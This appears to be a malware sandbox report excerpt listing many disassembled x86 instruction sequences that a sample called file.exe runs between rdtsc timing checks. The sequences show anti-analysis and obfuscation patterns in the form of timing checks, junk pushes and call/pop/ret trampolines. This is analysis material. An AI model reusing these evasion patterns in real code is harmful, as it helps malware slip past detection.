              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577D5C second address: 577DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD001095A61h 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FD001095A58h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov esi, edi 0x00000029 xor dword ptr [ebp+122D1C28h], eax 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FD001095A5Ah 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577DAF second address: 577DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD000CC0C5Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577FBB second address: 577FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 577FBF second address: 577FF4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD000CC0C63h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD000CC0C68h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5782A8 second address: 5782AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5783C6 second address: 5783F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C5Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD000CC0C68h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5783F0 second address: 578414 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD001095A5Ah 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578414 second address: 578428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578428 second address: 57842E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5789C0 second address: 578A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FD000CC0C62h 0x00000011 je 00007FD000CC0C5Ch 0x00000017 jng 00007FD000CC0C56h 0x0000001d nop 0x0000001e sub dword ptr [ebp+122D1C72h], ebx 0x00000024 push 00000000h 0x00000026 mov di, si 0x00000029 mov di, si 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007FD000CC0C58h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 jng 00007FD000CC0C6Ah 0x0000004e call 00007FD000CC0C60h 0x00000053 mov di, cx 0x00000056 pop esi 0x00000057 mov dword ptr [ebp+122D1FFFh], ebx 0x0000005d xchg eax, ebx 0x0000005e jc 00007FD000CC0C62h 0x00000064 jc 00007FD000CC0C5Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 578A3C second address: 578A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 pushad 0x00000007 jg 00007FD001095A56h 0x0000000d jp 00007FD001095A56h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5792A2 second address: 5792BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD000CC0C66h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A316 second address: 57A38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD001095A56h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FD001095A58h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edi, 7C6353F3h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FD001095A58h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e push 00000000h 0x00000050 jnc 00007FD001095A5Ah 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 pushad 0x00000059 push esi 0x0000005a pop esi 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57ADE2 second address: 57AE05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FD000CC0C60h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57AABD second address: 57AAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57AAC1 second address: 57AAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57AAC5 second address: 57AACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57AACB second address: 57AAE1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD000CC0C5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B5C5 second address: 57B5CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57AAE1 second address: 57AAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B80C second address: 57B87C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FD001095A62h 0x00000010 jmp 00007FD001095A5Ch 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FD001095A58h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 js 00007FD001095A58h 0x00000039 mov esi, ecx 0x0000003b push 00000000h 0x0000003d mov di, FFFCh 0x00000041 push 00000000h 0x00000043 jmp 00007FD001095A61h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c jns 00007FD001095A56h 0x00000052 pop esi 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B5CB second address: 57B5E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FD000CC0C64h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57AAE6 second address: 57AB04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD001095A69h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57B5E7 second address: 57B5EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D9E3 second address: 57D9E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D9E7 second address: 57D9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57D9ED second address: 57DA43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FD001095A58h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D1B68h], edx 0x00000030 xchg eax, ebx 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jng 00007FD001095A56h 0x0000003a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57DA43 second address: 57DA4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58184E second address: 581852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581852 second address: 581858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581858 second address: 58185F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5829E4 second address: 5829E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5829E9 second address: 582A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1AF5h], edi 0x0000000e sbb di, 78C7h 0x00000013 push 00000000h 0x00000015 mov edi, 26104D06h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FD001095A58h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 jmp 00007FD001095A68h 0x0000003b mov edi, dword ptr [ebp+12467085h] 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jne 00007FD001095A56h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 582A4E second address: 582A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 582A53 second address: 582A69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FD001095A56h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FD001095A56h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 582A69 second address: 582A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57E2C8 second address: 57E2D2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5809CC second address: 5809D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5809D2 second address: 5809D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 585FFD second address: 58604B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C62h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FD000CC0C58h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 movsx ebx, di 0x0000002a push 00000000h 0x0000002c mov ebx, esi 0x0000002e xchg eax, esi 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 js 00007FD000CC0C56h 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58604B second address: 586065 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FD001095A5Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5862DE second address: 5862F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535533 second address: 53553F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnc 00007FD001095A56h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53553F second address: 535543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58B904 second address: 58B9C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FD001095A5Ch 0x0000000f jmp 00007FD001095A67h 0x00000014 popad 0x00000015 nop 0x00000016 jmp 00007FD001095A62h 0x0000001b push 00000000h 0x0000001d jmp 00007FD001095A66h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007FD001095A58h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D1DA7h], eax 0x00000044 mov dword ptr [ebp+12465B64h], edi 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c pushad 0x0000004d jng 00007FD001095A56h 0x00000053 jmp 00007FD001095A69h 0x00000058 popad 0x00000059 push ebx 0x0000005a ja 00007FD001095A56h 0x00000060 pop ebx 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jp 00007FD001095A5Ch 0x0000006b jnl 00007FD001095A56h 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CAF2 second address: 58CAF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58CAF7 second address: 58CB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A5Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD001095A67h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BACE second address: 58BB58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FD000CC0C58h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D2ECFh] 0x00000029 push dword ptr fs:[00000000h] 0x00000030 pushad 0x00000031 mov ax, bx 0x00000034 mov ecx, dword ptr [ebp+122D1F65h] 0x0000003a popad 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov bx, cx 0x00000045 jg 00007FD000CC0C57h 0x0000004b mov eax, dword ptr [ebp+122D15C9h] 0x00000051 sbb ebx, 5EF8C6ADh 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ebx 0x0000005c call 00007FD000CC0C58h 0x00000061 pop ebx 0x00000062 mov dword ptr [esp+04h], ebx 0x00000066 add dword ptr [esp+04h], 00000014h 0x0000006e inc ebx 0x0000006f push ebx 0x00000070 ret 0x00000071 pop ebx 0x00000072 ret 0x00000073 mov ebx, dword ptr [ebp+122D2D77h] 0x00000079 nop 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BB58 second address: 58BB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD001095A56h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58BB63 second address: 58BB69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58AB3A second address: 58AB40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58DD73 second address: 58DD94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58DD94 second address: 58DD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58DD9A second address: 58DD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58EDCF second address: 58EE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FD001095A66h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD001095A62h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590CA1 second address: 590CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C66h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58FD55 second address: 58FD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590CBC second address: 590D2A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD000CC0C63h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FD000CC0C58h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov bx, CE7Fh 0x0000002d sub dword ptr [ebp+122D239Bh], edi 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D3ADAh], esi 0x0000003b push 00000000h 0x0000003d jmp 00007FD000CC0C5Ah 0x00000042 xchg eax, esi 0x00000043 push edi 0x00000044 push edx 0x00000045 js 00007FD000CC0C56h 0x0000004b pop edx 0x0000004c pop edi 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58FE58 second address: 58FE5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591C42 second address: 591C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591C48 second address: 591CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FD001095A58h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D3A31h], edi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FD001095A58h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 push ecx 0x00000046 or dword ptr [ebp+122D3A5Bh], edx 0x0000004c pop ebx 0x0000004d mov di, D602h 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591CB0 second address: 591CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590E6B second address: 590EE5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD001095A5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add ebx, 2BA3B991h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr [ebp+122D364Eh], eax 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 call 00007FD001095A5Bh 0x0000002c mov ebx, eax 0x0000002e pop ebx 0x0000002f mov eax, dword ptr [ebp+122D133Dh] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FD001095A58h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov ebx, 742E4FF6h 0x00000054 mov dword ptr [ebp+12458E47h], edx 0x0000005a push FFFFFFFFh 0x0000005c mov bx, 1C00h 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 pop esi 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591CB4 second address: 591CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590EE5 second address: 590EF7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FD001095A56h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591CBE second address: 591CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 590EF7 second address: 590EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 591EEA second address: 591EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599B29 second address: 599B45 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD001095A58h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD001095A5Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 599402 second address: 599407 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
